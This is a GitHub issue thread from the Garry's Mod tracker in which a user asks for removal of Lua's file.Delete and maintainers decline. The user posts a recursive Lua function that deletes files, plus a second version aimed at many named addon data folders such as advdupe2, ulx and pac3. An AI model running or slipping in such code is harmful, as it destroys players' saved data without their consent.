### ISSUE TITLE
Remove function local function DeleteAllRecursive(folder)

### ISSUE THREAD

**Issue by PlayYou** [Facepunch/garrysmod-issues#3096]
### Details
With this function, we can delete files from user

### Steps to reproduce
Exemple of code:

>  local function DeleteAllRecursive(folder)
        local files,dirs=file.Find(folder.."/*","DATA")
PrintTable(files) PrintTable(dirs)
        for k,v in pairs(files) do
                file.Delete( folder.."/"..v )
        end
        for k,v in pairs(dirs) do
                DeleteAllRecursive(folder.."/"..v)
        end
end

And, with cl_downloadfilter noworkshop, it's more easy to make this.

**Comment by robotboy655** [comment]
Assuming you are suggesting to remove file.Delete, its not going to happen.

There's nothing really can be done about server's being able to remove all files in data/ folder.

**Comment by PlayYou** [comment]
I not mean for servers, but for users

**Comment by robotboy655** [comment]
What

**Comment by PlayYou** [comment]
> local function DeleteAllRecursive(folder)
        local files,dirs=file.Find(folder.."/*","DATA")
		PrintTable(files) PrintTable(dirs)
        for k,v in pairs(files) do
                file.Delete( folder.."/"..v )
        end
        for k,v in pairs(dirs) do
                DeleteAllRecursive(folder.."/"..v)
        end
end
 
DeleteAllRecursive("adv_duplicator")
DeleteAllRecursive("advdupe2")
DeleteAllRecursive("advdupe2_maps")
DeleteAllRecursive("aigraph")
DeleteAllRecursive("cpuchip")
DeleteAllRecursive("dplas")
DeleteAllRecursive("e2files")
DeleteAllRecursive("expression2")
DeleteAllRecursive("gpuchip")
DeleteAllRecursive("harry_potter")
DeleteAllRecursive("harry_potter_cfg")
DeleteAllRecursive("murder")
DeleteAllRecursive("pac3")
DeleteAllRecursive("pill_config")
DeleteAllRecursive("soundlist")
DeleteAllRecursive("spuchip")
DeleteAllRecursive("ulib")
DeleteAllRecursive("ulx")
DeleteAllRecursive("ulx_logs")
DeleteAllRecursive("cpuchip")
DeleteAllRecursive("dplas")
DeleteAllRecursive("adv_duplicator")
DeleteAllRecursive("advdupe2")
DeleteAllRecursive("advdupe2_maps")
DeleteAllRecursive("aigraph")
DeleteAllRecursive("cpuchip")
DeleteAllRecursive("dplas")

**Comment by PlayYou** [comment]
This code delete all data in data folder !

**Comment by PlayYou** [comment]
User and for servers (I've tested my self)

**Comment by PlayYou** [comment]
Video here : https://i.gyazo.com/709a2a3c9bc24638514887b10ace29e8.mp4

**Comment by PlayYou** [comment]
The code work for users and servers.

**Comment by Kefta** [comment]
You're still asking file.Delete to be removed clientside

**Comment by robotboy655** [comment]
Users can't delete files on the server.

**Comment by robotboy655** [comment]
As for addons, by your logic we should remove code that allows people to run lua code and make people admins, because addons can abuse that?

**Comment by PlayYou** [comment]
Maybe, but this code is very important.

**Comment by bigdogmat** [comment]
I mean, by this logic we should just remove `file.Write` considering they can overwrite everything in your data folder with blank files. Just because something can be abused, that doesn't mean it should be removed.

**Comment by freemmaann** [comment]
If you want this so bad, just reroute the function manually.
